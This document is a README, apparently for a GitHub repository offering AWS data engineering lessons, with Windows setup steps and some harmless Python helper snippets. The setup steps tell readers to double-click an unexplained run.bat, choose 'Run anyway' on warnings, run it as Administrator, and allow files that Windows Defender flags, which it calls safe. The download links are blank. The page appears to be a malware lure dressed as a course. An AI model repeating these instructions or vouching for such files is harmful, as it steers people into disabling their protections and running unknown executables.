This repository is a collection of data engineering lessons and projects built around AWS. It teaches SQL, PySpark, Kafka, Airflow, and Databricks, and uses more than 20 AWS services, including Glue, Redshift, and Athena. The material is step-by-step and runs from beginner to advanced level.
The repository also includes 15 projects in which you build real-world data pipelines with technologies such as Delta Lake, Iceberg, and CI/CD (Continuous Integration and Continuous Delivery), so you can practice what the lessons teach.
Topics covered include airflow, aws, bigquery, cassandra, databricks, flink, gcp, github-actions, hadoop, hive, kafka, mongodb, python, snowflake, spark, and sql.
This README explains how to get the application running on a Windows computer.
Before installing, make sure your computer meets these minimum requirements:
- Windows 10 or newer (64-bit recommended)
- 8 GB of RAM or more
- At least 10 GB free disk space
- Internet connection for downloading and updates
- Administrator rights on your PC
For better performance, close other resource-heavy programs while using this tool.
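If Python is already installed, part of the requirements list can be checked with a short script. This is a minimal sketch using only the standard library. The function names are hypothetical and not part of the project. It checks the operating system, whether the Python interpreter is a 64-bit build (which is not the same as checking Windows itself), and free disk space. RAM and administrator rights are not checked here.

```python
import platform
import shutil
import sys

MIN_FREE_GB = 10  # taken from the requirements list above


def free_disk_gb(path="."):
    """Return free space, in GiB, on the drive that holds `path`."""
    return shutil.disk_usage(path).free / (1024 ** 3)


def is_64bit():
    """True when the running Python interpreter is a 64-bit build."""
    return sys.maxsize > 2 ** 32


def check_requirements(path="."):
    """Return a dict mapping each check name to True or False."""
    return {
        "windows": platform.system() == "Windows",
        "64bit": is_64bit(),
        "disk": free_disk_gb(path) >= MIN_FREE_GB,
    }


if __name__ == "__main__":
    for name, ok in check_requirements().items():
        print(f"{name}: {'ok' if ok else 'check manually'}")
```

Pass the folder you plan to extract into as `path` so the disk check looks at the right drive.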
You will download the app from the main project page on GitHub. You do not need to run or compile any code manually. It is ready to use once installed with the steps below.
Click the green button above or open this link in your web browser:
This page has the full project files and instructions.
Once on the GitHub page, find the "Code" button near the top right.
- Click the "Code" button.
- Select "Download ZIP" from the dropdown menu.
- Save the ZIP file to a folder you can find easily, such as your Desktop or Downloads.
Find the ZIP file you downloaded and extract it:
- Right-click the ZIP file.
- Select "Extract All..."
- Choose a location where you want the files to go, like your Documents folder.
- Click "Extract".
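The extraction steps above can also be done from a script. The following is a sketch using Python's standard `zipfile` module. The function name `extract_zip` is hypothetical, and the actual ZIP file name depends on what GitHub gives you, so it is left as a parameter.

```python
import zipfile
from pathlib import Path


def extract_zip(zip_path, dest_dir):
    """Extract every file in zip_path into dest_dir and return dest_dir as a Path."""
    dest = Path(dest_dir)
    dest.mkdir(parents=True, exist_ok=True)  # create the target folder if needed
    with zipfile.ZipFile(zip_path) as archive:
        archive.extractall(dest)
    return dest
```

Call it with the path to the downloaded ZIP and the folder you want the files in, for example a folder inside Documents.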
Open the extracted folder. Look for a file named run.bat or start.bat.
- Double-click this file to launch the program.
- If you see a warning about permissions, choose "Run anyway".
This file will start all necessary services and open a browser window for you to interact with the learning platform.
If neither file is present, open README_FIRST.pdf or README_FIRST.txt in the same folder for more specific instructions.
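The lookup order described above (a launcher file first, then the README_FIRST file) can be sketched as a small helper. The function name `find_launcher` is hypothetical. The file names come from this README, and the sketch assumes they sit at the top level of the extracted folder.

```python
from pathlib import Path

LAUNCHERS = ("run.bat", "start.bat")
FALLBACKS = ("README_FIRST.pdf", "README_FIRST.txt")


def find_launcher(folder):
    """Return (kind, path), where kind is 'launcher', 'readme', or 'none'."""
    root = Path(folder)
    # Launchers are checked first; the README files are only a fallback.
    for kind, names in (("launcher", LAUNCHERS), ("readme", FALLBACKS)):
        for name in names:
            candidate = root / name
            if candidate.is_file():
                return kind, candidate
    return "none", None
```

The helper only reports which file it found. Starting the file is still done by double-clicking it, as described above.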
The application uses a web browser interface for all interactions. You will complete courses and projects inside your web browser.
When you run the run.bat file, it will start:
- A local server that gives you access to lessons and projects
- Tools like Airflow to schedule workflows
- Databricks-like environments for coding practice
- Simulated connections to AWS services for cloud tasks
You can open many parts of the curriculum and projects directly from your browser, without extra setup.
For some projects, you might want to install software like:
- AWS CLI to access real AWS services
- Python 3.8+ for running sample scripts
- Docker for containerized environments
This software works without them, but these tools add more features if you want to go further.
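To see which of these optional tools are already on your PATH, a sketch like the following can help. It uses `shutil.which` from the standard library. The command names `aws`, `python`, and `docker` are the usual executable names for these tools, and the function name is hypothetical.

```python
import shutil

# Label shown to the user -> command name looked up on PATH
OPTIONAL_TOOLS = {"AWS CLI": "aws", "Python": "python", "Docker": "docker"}


def find_optional_tools(tools=OPTIONAL_TOOLS):
    """Map each tool label to its executable path, or None if it is not on PATH."""
    return {label: shutil.which(cmd) for label, cmd in tools.items()}


if __name__ == "__main__":
    for label, path in find_optional_tools().items():
        print(f"{label}: {path or 'not found'}")
```

A result of "not found" only means the command is not on PATH. The tool may still be installed somewhere else.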
- SQL Training: Learn how to write database queries.
- PySpark Labs: Practice big data processing with Spark.
- Kafka Workflows: Stream data between systems.
- Airflow Automation: Schedule tasks and data pipelines.
- Databricks Simulation: Try notebooks similar to the popular platform.
- AWS Services: Learn tools like Glue, Redshift, and Athena.
- Industrial Projects: Build from start to finish using modern technology.
- Version Control: Use GitHub for code management and tracking.
All features are designed to help you become familiar with the tools and platforms used in data engineering jobs today.
Inside the extracted folder, you will find:
- curriculum/ – Course materials and session notes
- projects/ – Industrial projects with full instructions
- scripts/ – Helper scripts for setup and running jobs
- configs/ – Configuration files for AWS service simulations
- docs/ – Additional documentation and guides
- run.bat – Main launcher file
Explore the folders to see the content before running the app if you want.
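To confirm that extraction produced the layout listed above, the following sketch reports any expected entry that is missing. The entry names come from this README. The function name `missing_entries` is hypothetical.

```python
from pathlib import Path

# Top-level entries this README says the extracted folder contains
EXPECTED = ("curriculum", "projects", "scripts", "configs", "docs", "run.bat")


def missing_entries(folder, expected=EXPECTED):
    """Return the expected names that do not exist directly inside folder."""
    root = Path(folder)
    return [name for name in expected if not (root / name).exists()]
```

An empty list means every listed entry was found. If everything is reported missing, the ZIP may have extracted into a nested subfolder, so try pointing the function one level deeper.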
- Application does not start: Right-click run.bat and select "Run as Administrator".
- Browser does not open automatically: Open your browser and visit http://localhost:8080
- Error messages about missing Python or Java: Install Python 3.8+ from python.org, and Java 8 or above from oracle.com
- Firewall blocks connection: Allow connection on port 8080 through your firewall settings.
- Windows Defender flags files: Allow the files after checking them, as these are safe scripts and executables from the project.
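When the browser page does not load, it helps to know whether anything is listening on port 8080 at all. The sketch below tries a plain TCP connection using the standard `socket` module. The function name `port_is_open` is hypothetical, and the default port is the one given in the troubleshooting list above.

```python
import socket


def port_is_open(host="localhost", port=8080, timeout=2.0):
    """Return True if a TCP connection to host:port succeeds within timeout seconds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # Covers refused connections, timeouts, and name resolution failures.
        return False


if __name__ == "__main__":
    state = "reachable" if port_is_open() else "not reachable"
    print(f"localhost:8080 is {state}")
```

If the port is not reachable, the local server most likely did not start. If it is reachable but the browser still cannot load the page, look at the firewall or browser settings instead.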
- Close other heavy programs to keep performance smooth.
- Use Google Chrome or Firefox for the best browser experience.
- Save your work often within the web platform.
- Read the project instructions carefully before starting.
- Use the folder structure to locate resources easily.
You can visit this page to download:
Or use the button at the top to go straight there.
Once downloaded and extracted, run run.bat to open the learning platform. Follow the in-browser instructions to start your data engineering journey.